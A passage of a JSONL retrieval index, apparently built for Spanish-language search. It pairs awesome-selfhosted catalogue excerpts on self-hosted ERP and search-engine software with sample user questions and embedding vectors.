planning", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Resource Planning: Dolibarr β€” Modern CRM software package to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, accounting, ...) [GPL-3.0, PHP/deb]. ERPNext β€” ERP system to help you run your business [GPL-3.0, Python/Docker]. farmOS β€” Web-based farm record keeping application [GPL-2.0, PHP/Docker]. grocy β€” ERP beyond your fridge. Groceries & household management solution for your home [MIT, PHP/Docker]. LedgerSMB β€” Integrated accounting and ERP system for small and midsize businesses, with double entry accounting, budgeting, invoicing, quotations, projects, orders and inventory management, shipping and more [GPL-2.0, Docker/Perl]. Odoo β€” Free open source ERP system [LGPL-3.0, Python/deb/Docker]. OFBiz β€” Enterprise Resource Planning system with a suite of business applications flexible enough to be used across any industry [Apache-2.0, Java]. Tryton β€” Free open source business solution [GPL-3.0, Python].", "indexar": "que programa puedo usar para gestionar la actividad de mi empresa o fundaciΓ³n sin pagar licencias?", "v": [0.04859, 0.05866, -0.11931, -0.26464, 0.08697, -0.08951, -0.04923, -0.07118, -0.26906, -0.08987, 0.00268, -0.11361, 0.01902, -0.03502, 0.04008, 0.03337, 0.00609, -0.16488, -0.02265, 0.01507, -0.03857, 0.05597, 0.06773, 0.01332, -0.05892, -0.00822, 0.10858, -0.22532, -0.06548, 0.09188, 0.07661, 0.06034, 0.11826, -0.10442, 0.0803, 0.00855, -0.03597, -0.00566, 0.15782, 0.00446, -0.02157, 0.03833, -0.0257, -0.01242, 0.04595, -0.03445, 0.03356, -0.0756, -0.01781, 0.00085, -0.00298, -0.04364, -0.07231, -0.0944, 0.10481, -0.0037, -0.03127, -0.13711, -0.05046, 0.00812, -0.06753, 0.01867, 0.0209, -0.00061, -0.00991, 0.01502, 0.18376, 0.02095, -0.0163, 0.01895, -0.02871, -0.04032, -0.08567, 0.03818, 0.02143, -0.01293, 0.04158, -0.05797, 0.0039, 0.05127, 0.04344, 0.01011, 0.01659, 0.02442, -0.03036, -0.06107, 0.04007, 0.06069, 0.05834, -0.01681, -0.08454, 0.0466, -0.05695, 0.02298, -0.04311, -0.02187, 0.0697, 0.09802, -0.0227, 0.07722, -0.00841, 0.07063, -0.07913, -0.02994, -0.04092, 0.10237, 0.05061, -0.12138, -0.0455, 0.0288, -0.05528, -0.02461, -0.07997, -0.08384, -0.09123, 0.10656, -0.01747, -0.11257, 0.028, -0.02085, -0.047, -0.09075, 0.08585, 6e-05, 0.0579, 0.02469, -0.00691, 0.23775, -0.0722, -0.00518, -0.02577, 0.0023, -0.00179, -0.0142, -0.07424, 0.00732, -0.07096, 0.03738, -0.04854, -0.06827, 0.0393, 0.06783, 0.03746, 0.03929, 0.07735, 0.00743, -0.08477, -0.11744, -0.02878, -0.02097, -0.02147, -0.07577, 0.0221, 0.09387, -0.07811, 0.04568, 0.03379, -0.02171, -0.02995, 0.1248, -0.00482, 0.02011, -0.09043, -0.02603, 0.01713, -0.003, -0.04013, -0.00602, 0.0164, 0.0818, -0.01784, 0.00235, 0.04277, -0.04183, 0.06912, -0.00601, -0.01805, -0.07204, 0.06704, -0.01418, -0.00877, 0.05091, 0.01808, -0.0028, 0.00923, 0.04166, -0.02166, 0.08116, 0.02652, 0.01381, -0.00108, 0.04001, 0.03491, -0.06128, 0.02575, -0.0213, -0.00988, -0.02423, 0.02767, -0.02924, -0.05215, 0.00949, -0.099, 0.00287, 0.05031, -0.00815, -0.01222, 0.07766, 0.04899, 0.05974, 0.00156, -0.04139, 0.03516, 0.02345, -0.08213, 0.00209, 0.0213, -0.01148, 0.04269, 0.0306, 0.02757, -0.02109, 0.03047, 0.03511, -0.01775, -0.07279, 0.07288, 0.00284, 0.00046, 0.02241, -0.0401, 0.07002, -0.04867, -0.03531, 0.00858, 0.00362, 0.03798, -0.02164, 0.01273, 0.00453, 0.00812, 0.08641, 0.00639, -0.00849, -0.06395, 0.0212, -0.05754, 0.01899, -0.04134, -0.00737, -0.01805, 0.0509, 0.03349, -0.00082, 0.04706, 0.01495]} +{"tipo": "pregunta", "herramienta": "Resource Planning", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Resource Planning", "tema": "resource planning", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Resource Planning: Dolibarr β€” Modern CRM software package to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, accounting, ...) [GPL-3.0, PHP/deb]. ERPNext β€” ERP system to help you run your business [GPL-3.0, Python/Docker]. farmOS β€” Web-based farm record keeping application [GPL-2.0, PHP/Docker]. grocy β€” ERP beyond your fridge. Groceries & household management solution for your home [MIT, PHP/Docker]. LedgerSMB β€” Integrated accounting and ERP system for small and midsize businesses, with double entry accounting, budgeting, invoicing, quotations, projects, orders and inventory management, shipping and more [GPL-2.0, Docker/Perl]. Odoo β€” Free open source ERP system [LGPL-3.0, Python/deb/Docker]. OFBiz β€” Enterprise Resource Planning system with a suite of business applications flexible enough to be used across any industry [Apache-2.0, Java]. Tryton β€” Free open source business solution [GPL-3.0, Python].", "indexar": "cual es una alternativa libre a un ERP que pueda manejar inventario y facturacion?", "v": [0.001, -0.04839, -0.13659, -0.18366, 0.03866, -0.0005, 0.16501, -0.02383, -0.289, -0.17045, -0.1249, -0.08092, 0.10934, 0.02794, 0.03211, 0.03868, -0.01136, -0.0521, 0.12176, 0.05179, -0.1095, 0.06381, -0.09747, -0.01277, -0.13732, 0.0744, -0.12757, 0.07579, -0.11654, 0.04399, 0.14449, 0.11518, 0.10287, -0.06582, -0.01816, 0.1428, 0.16078, 0.09893, 0.07396, -0.10856, 0.13145, 0.0419, -0.11094, 0.05351, 0.01224, -0.05657, 0.05743, 0.09556, 0.0935, 0.04679, -0.02885, -0.03352, -0.07464, 0.0159, 0.10721, -0.01471, 0.09159, -0.02115, 0.14186, -0.00126, -0.04114, 0.06434, -0.06118, -0.0263, -0.11826, 0.02238, -0.03396, 0.02533, -0.02715, -0.00431, -0.11735, -0.01375, -0.04192, -0.03153, -0.06942, -0.04052, 0.02982, 0.01136, -0.0008, 0.08169, 0.02586, -0.11313, -0.0621, 0.08802, -0.09275, -0.09685, 0.08328, -0.03106, 0.05092, 0.0087, 0.02408, -0.01452, -0.01598, 0.11051, 0.03045, -0.02697, 0.05395, 0.11092, -0.05182, 0.02836, -0.01055, 0.08356, -0.10775, 0.01848, 0.00798, 0.04238, 0.01979, 0.0046, -0.02113, 0.06895, -0.01657, 0.04113, -0.03612, -0.05112, 0.04044, -0.02859, 0.0276, 0.04187, -0.04638, 0.01044, 0.04388, 0.00688, 0.03703, -0.10716, 0.09432, -0.03134, 0.05387, 0.09932, 0.01708, 0.05147, 0.03931, 0.00636, -0.04301, -0.09432, -0.05313, -0.07174, -0.00419, -0.05255, 0.02301, 0.03269, -0.04594, -0.03325, 0.02391, -0.06081, 0.06296, -0.09866, 0.00544, -0.02814, 0.01251, 0.01081, 0.00165, 0.02857, 0.00181, 0.10307, 0.00415, -0.00956, 0.01034, 0.00441, -0.05021, -0.01163, 0.00142, 0.01224, -0.02542, 0.02845, -0.02072, -0.07643, -0.00903, 0.02338, 0.01991, -0.03321, -0.0095, 0.04207, 0.0393, -0.00953, 0.01809, -0.099, -0.07551, -0.09967, 0.04561, 0.00506, -0.02549, -0.03093, -0.05019, -0.03822, -0.00397, -0.00351, -0.03699, 0.00899, 0.02297, 0.03798, 0.03695, 0.05497, -0.05986, -0.11821, -0.02634, 0.00299, -0.00685, -0.01206, 0.00219, 0.00839, 0.00051, -0.04484, -0.00265, -0.03369, -0.00491, 0.00285, 0.00697, 0.08797, 0.01203, 0.02441, 0.02069, 0.02094, 0.08415, -0.05425, -0.02973, -0.01549, -0.04356, -0.02653, 0.02657, -0.02381, 0.04264, 0.04686, 0.03098, -0.05142, -0.01946, 0.03325, -0.01263, 0.05817, -0.02011, 0.03563, -0.01197, -0.00305, 0.02595, 0.0358, -0.01436, 0.00158, 0.01235, -0.00735, -0.0028, -0.01514, 0.05493, 0.08406, -0.00094, -0.04423, -0.00628, 0.00472, -0.03797, -0.01979, -0.02763, -0.04558, -0.03679, 0.00646, 0.02881, 0.02121, 0.02247, -0.03521]} +{"tipo": "pregunta", "herramienta": "Resource Planning", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Resource Planning", "tema": "resource planning", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Resource Planning: Dolibarr β€” Modern CRM software package to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, accounting, ...) [GPL-3.0, PHP/deb]. ERPNext β€” ERP system to help you run your business [GPL-3.0, Python/Docker]. farmOS β€” Web-based farm record keeping application [GPL-2.0, PHP/Docker]. grocy β€” ERP beyond your fridge. Groceries & household management solution for your home [MIT, PHP/Docker]. LedgerSMB β€” Integrated accounting and ERP system for small and midsize businesses, with double entry accounting, budgeting, invoicing, quotations, projects, orders and inventory management, shipping and more [GPL-2.0, Docker/Perl]. Odoo β€” Free open source ERP system [LGPL-3.0, Python/deb/Docker]. OFBiz β€” Enterprise Resource Planning system with a suite of business applications flexible enough to be used across any industry [Apache-2.0, Java]. Tryton β€” Free open source business solution [GPL-3.0, Python].", "indexar": "con que herramienta puedo controlar los alimentos en casa y las compras del supermercado?", "v": [-0.02236, 0.0164, -0.04126, -0.19641, -0.13311, -0.09467, -0.08089, 0.09798, -0.10754, -0.09676, -0.11119, -0.01659, 0.00164, -0.06992, -0.02819, 0.03692, 0.08422, -0.06113, 0.02783, 0.08539, 0.07351, -0.06633, -0.1147, 0.00688, -0.14629, 0.08204, 0.11222, 0.05014, -0.24178, 0.15023, 0.00825, -0.06457, 0.05848, -0.07789, -0.12925, -0.04924, -0.08539, 0.00833, 0.0638, -0.01421, 0.09328, 0.03009, 0.04927, -0.10186, 0.01065, 0.08308, 0.02967, -0.03925, -0.03327, 0.04465, -0.08015, -0.12285, -0.08038, 0.0373, 0.03075, 0.04461, 0.0124, -0.02781, 0.17916, -0.05958, -0.03692, -0.02042, 0.15963, 0.04238, -0.03617, 0.04917, -0.08524, -0.0098, -0.02237, -0.00941, -0.05538, 0.05193, -0.04531, -0.00925, -0.0959, -0.02708, 0.02886, 0.1074, 0.06278, -0.07135, -0.03037, -0.09045, 0.00307, -0.04315, 0.09632, -0.16345, -0.07804, -0.05519, -0.07211, -0.05849, 0.02399, 0.02694, 0.01081, -0.01678, 0.02711, -0.04081, 0.00525, -0.07226, -0.04145, 0.06353, 0.08448, -0.1216, -0.11716, 0.12183, -0.01773, -0.02211, -0.01161, 0.03288, -0.08706, -0.14733, 0.05266, 0.05308, -0.0073, -0.08387, 0.07195, 0.11206, -0.10605, 0.01968, -0.01762, -0.0363, -0.03264, 0.06997, -0.06469, 0.02114, 0.02605, -0.01652, 0.06586, 0.05168, -0.01147, -0.03674, 0.03691, 0.05411, 0.1024, -0.01893, 0.04427, -0.07961, -0.08519, -0.09218, -0.02687, -0.046, -0.07099, 0.00758, 0.03259, -0.07788, 0.04362, -0.04909, -0.09629, 0.02985, -0.0489, 0.05789, -0.01253, 0.0309, 0.03431, 0.01799, 0.10797, 0.04605, -0.04269, -0.00157, -0.02518, 0.0238, -0.10014, 0.02138, -0.07008, -0.01656, -0.07469, -0.04007, 0.10535, 0.02595, 0.03098, 0.00698, -0.02022, 0.05128, -0.03862, 0.02608, -0.05609, -0.09482, -0.00111, -0.02802, -0.02061, -0.0505, -0.02405, 0.02876, -0.00367, 0.02165, 0.02445, -0.02913, -0.01851, 0.00955, -0.00303, 0.04208, -0.06519, 0.02405, 0.0168, -0.0719, -0.02372, 0.06676, -0.04696, 0.03656, 0.04889, -0.00275, -0.03428, -0.08045, 0.09575, 0.00313, 0.03437, 0.06435, -0.04283, 0.06126, 0.00962, 0.01086, 0.02375, -0.04518, 0.07419, 0.0123, -0.04111, -0.03582, 0.00059, 0.01215, -0.05823, -0.00224, 0.03592, 0.03688, 0.03768, 0.00762, -0.00962, -0.01931, -0.00391, 0.05013, -0.00069, 0.01491, 0.00579, -0.01659, 0.01875, 0.00792, -0.00101, -0.08384, 0.02344, -0.01536, -0.03029, 0.00491, -0.05021, 0.06082, -0.02655, -0.02208, -0.04242, -0.03287, -0.01407, 0.01448, 0.00403, -0.04347, 0.01212, -0.04548, 0.04982, -0.01938, -0.01048, 0.03135]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Aleph β€” Tool for indexing large amounts of both documents (PDF, Word, HTML) and structured (CSV, XLS, SQL) data for easy browsing and search. It is built with investigative reporting as a primary use case [MIT, Docker/K8S]. Amgix β€” Open-source hybrid search engine built for flexible deployment and real-world messy data [AGPL-3.0, Docker/K8S]. Apache Solr β€” Enterprise search platform featuring full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, and rich document (e.g., Word, PDF) handling [Apache-2.0, Java/Docker/K8S]. Fess β€” Powerful and easily deployable Enterprise Search Server [Apache-2.0, Java/Docker]. Hister β€” Personal web search engine with automatic indexing of visited websites. Supports offline local result previews, local files, multi-user handling and optional semantic search [AGPL-3.0, Go/Docker]. Manticore Search β€” Full-text search and data analytics, with fast response time for small, medium and big data (alternative to Elasticsearch) [GPL-3.0, Docker/deb/C++/K8S].", "indexar": "que herramienta sirve para montar un buscador propio que indexe documentos PDF y Excel?", "v": [0.09277, 0.02934, -0.11152, -0.18826, 0.03596, -0.13916, 0.03527, -0.12473, -0.06395, -0.07376, -0.08407, -0.01751, -0.01827, -0.22252, 0.06844, -0.0071, 0.14372, -0.15731, -0.05867, -0.03494, 0.02368, 0.00191, -0.0882, -0.07651, -0.06121, 0.02003, -0.12147, -0.07868, -0.09072, 0.05567, 0.03096, 0.09666, -0.03622, -0.05165, -0.11598, -0.01901, -0.01801, 0.04413, -0.12119, -0.02582, 0.04308, 0.04991, -0.18618, 0.13011, -0.08529, 0.00508, -0.03269, 0.06133, -0.04771, 0.07614, 0.02259, -0.18235, -0.11642, 0.08183, -0.06774, -0.12759, 0.17771, -0.1229, 0.07975, -0.14255, -0.01278, 0.00166, -0.04234, 0.01156, -0.08177, -0.01869, 0.03963, -0.02409, -0.03261, -0.03492, -0.15453, -0.01563, 0.05146, -0.09512, -0.04798, -0.03505, 0.04105, 0.02322, -0.03255, 0.08581, 0.06533, -0.06723, -0.1279, 0.03079, -0.08203, -0.09941, 0.0655, -0.01379, 0.08311, -0.05955, 0.00536, 0.0485, 0.01093, 0.04848, -0.0056, -0.08081, 0.03381, -0.01882, 0.01882, 0.038, 0.06121, -0.00442, -0.03795, 0.02619, 0.00292, -0.02746, -0.02473, 0.0148, -0.08072, 0.06566, 0.06095, 0.01037, -0.02633, 0.02224, 0.01413, -0.05859, 0.00439, -0.04051, -0.0701, -0.12146, 0.01235, 0.01752, -0.04011, -0.0084, -0.00019, -0.10211, 0.05608, 0.08271, 0.01977, -0.03718, 0.09818, -0.05329, -0.15635, 0.00794, -0.01199, -0.02359, -0.01761, -0.10311, -0.02747, -0.01286, 0.02083, -0.0533, -0.01639, -0.09201, -0.01743, 0.02181, 0.07505, 0.05156, 0.03386, -0.04007, -0.01129, -0.04928, 0.05677, 0.05137, -0.05078, -0.0302, -0.00056, 0.02922, -0.00768, 0.01033, 0.00237, -0.01382, 0.02081, -0.00034, 0.01129, -0.02954, 0.01166, -0.00949, 0.08853, 0.00558, -0.01237, -0.0246, 0.03396, -0.11659, 0.05085, -0.06208, -0.0483, -0.02992, 0.07495, 0.00282, -0.03775, -0.02222, 0.00768, 0.01614, -0.05123, -0.03757, 0.05905, -0.06054, -0.00157, 0.01308, -0.01604, 0.02758, -0.0626, -0.02127, 0.02945, -0.05531, -0.07352, -0.05171, 0.07078, -0.03577, -0.03165, -0.01247, -0.0046, -0.01302, 0.048, 0.0397, -0.00209, 0.03054, 0.00761, 0.06002, -0.03302, 0.00739, 0.00986, -0.00086, -0.07483, -0.06268, 0.03761, 0.00113, -0.00198, 0.02375, 0.03198, 0.01693, 0.09464, -0.05842, 0.02352, 0.01598, 0.05596, -0.00636, -0.01512, -0.00019, 0.03369, -0.01399, -0.04959, -0.0043, 0.03297, 0.01308, 0.05641, -0.00926, -0.02401, -0.05034, 0.01654, 0.073, -0.00292, -0.05125, -0.0915, -0.00617, -0.02806, -0.00154, 0.05374, -0.04772, -0.01582, 0.00534, 0.07665, -0.0226, 0.01584, -0.09406]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Aleph β€” Tool for indexing large amounts of both documents (PDF, Word, HTML) and structured (CSV, XLS, SQL) data for easy browsing and search. It is built with investigative reporting as a primary use case [MIT, Docker/K8S]. Amgix β€” Open-source hybrid search engine built for flexible deployment and real-world messy data [AGPL-3.0, Docker/K8S]. Apache Solr β€” Enterprise search platform featuring full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, and rich document (e.g., Word, PDF) handling [Apache-2.0, Java/Docker/K8S]. Fess β€” Powerful and easily deployable Enterprise Search Server [Apache-2.0, Java/Docker]. Hister β€” Personal web search engine with automatic indexing of visited websites. Supports offline local result previews, local files, multi-user handling and optional semantic search [AGPL-3.0, Go/Docker]. Manticore Search β€” Full-text search and data analytics, with fast response time for small, medium and big data (alternative to Elasticsearch) [GPL-3.0, Docker/deb/C++/K8S].", "indexar": "con que programa puedo crear un motor de bΓΊsqueda flexible para datos desordenados en mi servidor?", "v": [-0.05541, 0.05505, -0.17289, -0.23081, -0.11906, -0.08955, -0.01031, -0.02944, -0.07524, -0.16038, -0.08779, -0.11953, 0.09638, -0.18087, -0.04087, 0.01635, 0.1825, -0.20637, 0.00623, 3e-05, -0.02804, -0.02943, 0.05348, -0.07461, -0.04292, 0.00655, 0.04245, -0.00983, -0.14687, -0.00344, 0.01226, 5e-05, 0.01865, 0.03329, -0.00209, -0.02291, 0.03655, 0.10029, -0.0434, -0.03412, -0.00845, -0.00359, -0.09172, 0.0463, 0.04327, 0.0512, 0.04711, -0.01322, 0.02545, -0.00137, -0.01192, -0.03753, -0.0696, 0.00224, 0.07701, -0.01957, 0.04905, -0.20216, -0.01638, 0.01671, -0.12557, -0.03092, -0.03026, -0.01052, 0.03489, 0.01239, 0.14061, 0.01222, -0.09992, 0.04049, -0.09381, 0.02417, -0.01922, -0.09554, 0.06649, 0.06263, 0.07284, -0.0341, -0.0003, 0.06615, -0.0162, 0.04769, -0.05685, 0.09929, -0.05335, 0.04235, 0.10251, -0.04129, 0.02025, 0.04744, 0.08224, 0.08394, -0.07729, 0.1603, 0.03454, 0.05103, 0.11586, -0.00875, -0.01502, 0.04837, 0.0548, -0.00641, -0.03987, 0.13303, 0.03694, 0.08475, 0.17135, 0.05332, -0.02502, 0.03509, 0.04999, -0.06229, -0.00835, -0.04639, -0.07362, -0.06282, -0.03297, 0.01035, 0.08948, 0.04784, -0.01189, -0.00491, -0.0017, 0.07876, 0.0072, -0.00331, 0.04483, 0.06159, -0.07216, 0.01871, 0.02812, 0.02154, -0.07328, -0.08087, 0.03245, 0.03457, 0.00651, -0.03231, 0.02733, -0.08392, 0.00712, 0.02423, 0.00439, 0.01015, 0.04378, -0.09414, 0.06469, -0.02105, -0.05982, 0.01776, -0.05393, -0.01071, 0.05078, 0.03282, -0.17986, 0.0337, -0.01271, -0.04763, -0.07932, -0.00552, 0.00327, 0.10765, -0.04122, 0.02238, 0.07571, 0.00259, 0.02246, 0.0246, 0.07424, 0.06495, -0.10157, 0.03411, 0.0629, -0.08491, 0.09072, 0.04429, -0.07507, -0.13768, -0.04966, 0.01637, -0.0302, 0.03448, -0.02875, -0.02414, -0.03394, -0.05751, 0.04084, 0.01283, -0.02025, -0.05569, 0.03174, 0.05636, 0.0119, 0.01054, 0.03311, -0.0333, -0.01413, 0.05417, 0.00418, -0.06629, -0.07176, 0.03826, -0.03283, -0.01924, -0.04795, 0.02966, -0.01819, 0.00075, 0.04843, 0.00584, -0.05251, -0.03659, 0.06568, -0.01431, -0.06807, -0.01925, 0.03996, -0.01563, 0.07396, -0.00087, -0.02957, 0.00761, 0.04306, 0.01564, 0.00017, -0.04294, 0.00753, -0.00672, 0.03951, -0.03446, -0.01976, -0.00822, -0.02584, -0.02254, 0.00569, -0.01735, -0.04095, -0.02135, -0.00239, -0.03221, -0.00318, 0.07592, -0.01403, -0.05389, 0.01316, -0.02949, -0.01324, -0.00402, -0.05457, -0.01554, -0.05423, -0.06056, 0.01708, -0.07185, 0.03407, 0.02357]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Aleph β€” Tool for indexing large amounts of both documents (PDF, Word, HTML) and structured (CSV, XLS, SQL) data for easy browsing and search. It is built with investigative reporting as a primary use case [MIT, Docker/K8S]. Amgix β€” Open-source hybrid search engine built for flexible deployment and real-world messy data [AGPL-3.0, Docker/K8S]. Apache Solr β€” Enterprise search platform featuring full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, and rich document (e.g., Word, PDF) handling [Apache-2.0, Java/Docker/K8S]. Fess β€” Powerful and easily deployable Enterprise Search Server [Apache-2.0, Java/Docker]. Hister β€” Personal web search engine with automatic indexing of visited websites. Supports offline local result previews, local files, multi-user handling and optional semantic search [AGPL-3.0, Go/Docker]. Manticore Search β€” Full-text search and data analytics, with fast response time for small, medium and big data (alternative to Elasticsearch) [GPL-3.0, Docker/deb/C++/K8S].", "indexar": "cual es una alternativa libre a Elasticsearch para hacer bΓΊsquedas de texto completo rΓ‘pida?", "v": [-0.15536, 0.06465, -0.15548, -0.03335, 0.01685, -0.06669, -0.0326, -0.11657, -0.05359, 0.00903, -0.07607, -0.11986, -0.07762, 0.02319, 0.12574, -0.08903, 0.11703, -0.05109, 0.11844, -0.01735, -0.06536, -0.11162, -0.19791, -0.11571, -0.05357, -0.1317, -0.118, 0.02184, -0.07918, 0.01961, -0.02415, 0.04648, 0.02904, -0.00932, -0.07937, 0.11672, 0.1939, -0.01508, 0.02582, -0.03571, 0.0426, 0.02639, -0.05668, -0.01107, -0.09005, -0.10942, -0.01932, 0.03152, -0.09607, -0.01494, -0.03024, -0.01129, -0.10631, 0.04475, 0.03026, -0.05471, 0.22062, -0.17948, -0.04744, -0.06213, -0.06262, -0.04029, 0.03133, 0.01221, -0.00194, 0.02345, 0.05477, 0.05226, -0.0218, 0.03097, 0.00174, -0.00322, -0.03506, 0.01477, -0.02772, 0.09661, -0.03265, -0.00586, 0.11539, 0.1098, 0.04624, -0.01351, 0.00665, 0.06386, -0.04158, -0.04155, 0.01746, -0.07853, 0.02689, 0.04375, 0.08752, -0.07198, -0.01792, 0.11108, -0.03188, -0.10266, 0.02495, -0.01564, -0.02343, 0.06432, 0.05184, -0.06958, -0.07414, 0.00182, -0.03936, -0.08088, -0.07087, 0.07444, -0.12847, 0.0436, 0.05222, -0.05018, -0.02978, -0.00065, 0.00112, -0.03484, -0.05292, -0.03321, 0.04817, -0.07183, -0.0569, 0.01752, -0.03316, -0.0427, 0.01146, -0.03286, 0.0745, 0.0136, 0.01574, 0.00413, 0.15109, 0.00895, -0.15227, -0.17468, -0.03788, -0.04412, 0.04547, 0.02348, 0.05076, -0.00053, -0.01326, -0.02065, -0.01326, -0.00062, 0.02276, -0.05781, 0.06411, -0.03224, 0.07669, -0.03099, -0.07694, -0.02168, 0.01223, 0.04111, -0.00845, -0.07517, -0.06962, 0.01676, -0.08331, 0.00481, 0.05032, 0.02629, -0.06592, -0.00976, 0.04512, 0.0257, -0.02724, -0.09687, -0.08712, -0.0084, -0.05472, -0.00542, 0.0326, -0.12169, 0.04328, 0.04556, 0.03576, -0.03905, -0.00662, -0.04475, 0.02353, -0.00274, -0.08733, 0.01261, -0.01243, -0.06739, 0.0803, 0.03175, -0.0071, -0.02269, -0.01268, -0.02332, -0.05813, -0.04046, -0.0478, 0.00384, 0.00529, -0.05974, -0.02384, -0.06597, -0.06449, -0.04005, -0.05386, -0.05474, -0.03897, -0.05256, 0.03171, -0.02922, -0.01257, 0.05894, 0.02427, 0.00292, 0.06749, 0.0549, -0.08009, -0.02552, 0.02625, -0.04992, 0.01437, 0.01294, 0.05112, 0.02908, 0.00435, 0.07657, 0.01764, 0.05233, 0.03595, -0.00606, -0.07713, -0.00848, 0.01859, -0.019, -0.05459, 0.02234, -0.01283, -0.02004, -0.00558, 0.00287, -0.01264, 0.00099, 0.04695, -0.01657, -0.06961, 0.03874, -0.04805, 0.00166, -0.10112, 0.02667, -0.04239, -0.04474, -0.05781, -0.01987, -0.00566, -0.04452, 0.09331, -0.06294]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: MeiliSearch β€” Ultra relevant, instant and typo-tolerant full-text search API [MIT, Rust/Docker/deb]. Meme Search β€” AI-powered meme search engine. Automatically extracts descriptions from images using vision-language models, then indexes with vector embeddings for semantic and keyword search [Apache-2.0, Docker]. OpenSearch β€” Distributed and RESTful search engine [Apache-2.0, Java/Docker/K8S/deb]. SearXNG β€” Internet metasearch engine which aggregates results from various search services and databases (Fork of Searx) [⚠, AGPL-3.0, Python/Docker]. Sosse β€” Selenium based search engine and crawler with offline archiving [AGPL-3.0, Python/Docker]. Typesense β€” Blazing fast, typo-tolerant open source search engine optimized for developer happiness and ease of use [GPL-3.0, C++/Docker/K8S/deb]. Websurfx β€” Aggregate results from other search engines (metasearch engine) without ads while keeping privacy and security in mind. It is extremely fast and provides a high level of customization (alternative to SearX) [⚠, AGPL-3.0, Rust/Docker].", "indexar": "que herramienta me sirve para hacer bΓΊsquedas ultra rΓ‘pidas y con correcciΓ³n automΓ‘tica de errores en el texto?", "v": [0.12439, 0.14724, -0.17469, -0.15976, 0.03931, -0.03464, -0.07662, -0.03269, 0.00265, -0.02057, -0.13333, -0.12291, 0.04134, -0.10069, 0.0489, -0.0299, 0.04515, -0.0385, 0.06981, -0.01517, 0.05654, -0.12271, -0.07583, -0.14394, -0.09303, -0.05106, -0.04286, -0.03484, -0.24254, -0.02369, -0.04443, 0.13945, 0.06015, -0.01311, -0.16507, 0.04075, 0.00073, 0.03366, -0.01031, 0.02975, 0.08088, 0.13416, -0.10572, -0.01047, 0.05187, -0.01612, 0.07706, 0.07127, -0.0771, 0.06624, 0.04805, -0.09258, -0.1001, -0.04842, -0.13667, -0.0863, 0.2122, -0.07841, -0.04636, -0.22494, -0.01724, -0.01133, -0.05388, 0.01453, -0.03831, 0.09392, 0.06075, -0.07586, -0.05029, 0.10673, -3e-05, 0.02514, 0.02051, 0.0097, -0.01422, 0.03931, -0.0237, 0.02384, 0.07461, 0.03388, 0.01618, -0.03833, -0.09385, 0.01819, 0.00458, -0.0948, 0.04904, -0.04406, 0.00392, -0.09452, 0.02221, -0.02499, 0.07812, -0.02034, 0.01575, -0.07637, 0.09106, -0.10426, -0.00637, 0.11794, 0.15094, -0.15102, -0.0833, 0.06262, -0.05522, 0.0174, -0.07307, 0.0251, -0.05958, -0.03421, 0.04545, 0.01112, -0.02482, -0.07182, 0.02808, 0.03556, 0.04307, 0.01482, -0.05138, -0.03088, 0.04019, -0.06059, -0.0309, -0.08474, -0.0379, 0.00077, -0.03172, 0.08402, 0.01524, -0.01465, 0.04006, -0.06564, -0.09597, -0.10053, 0.028, 0.0236, -0.00628, 0.00776, 0.01869, -0.01848, -0.0343, 0.00025, -0.0481, -0.03524, -0.03811, 0.02504, 0.08463, -0.03986, 0.0254, -0.00316, -0.04732, -0.00711, 0.06125, 0.0281, -0.03082, -0.03542, -0.04177, -0.01301, -0.06639, -0.00132, -0.02146, -0.04357, 0.01309, 0.027, 0.03025, -0.00553, -0.06309, -0.00499, 0.07487, -0.01127, -0.04333, 0.02213, 0.0172, -0.06888, 0.01561, 0.04276, -0.03373, 0.06545, 0.03036, -0.06249, -0.01588, -0.04213, -0.05883, 0.0261, 0.05132, -0.01806, 0.11865, -0.02209, 0.03672, -0.03017, -0.00887, -0.018, -0.00543, -0.062, -0.03354, 0.0587, -0.02299, 0.00887, 0.00466, -0.06729, -0.06356, -0.0152, -0.03674, -0.03455, -0.03426, 0.0475, -0.00301, -0.01862, 0.00326, 0.04135, -0.01137, 0.04263, 0.05357, -0.01609, -0.05965, -0.04027, -0.00187, 0.01744, -0.05612, 0.01023, 0.03709, -0.05716, -0.00945, 0.0587, -0.02527, 0.02998, 0.05316, -0.02613, -0.0293, -0.00977, 0.03197, 0.0165, -0.05961, -0.064, 0.00911, -0.04974, 0.04238, -0.00303, -0.04101, -0.05046, 0.03049, -0.01231, 0.02352, -0.00332, 0.00867, -0.00562, -0.01836, -0.025, -0.01136, -0.01751, -0.04806, -0.03952, 0.0243, -0.05957, 0.07678, -0.08383]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo 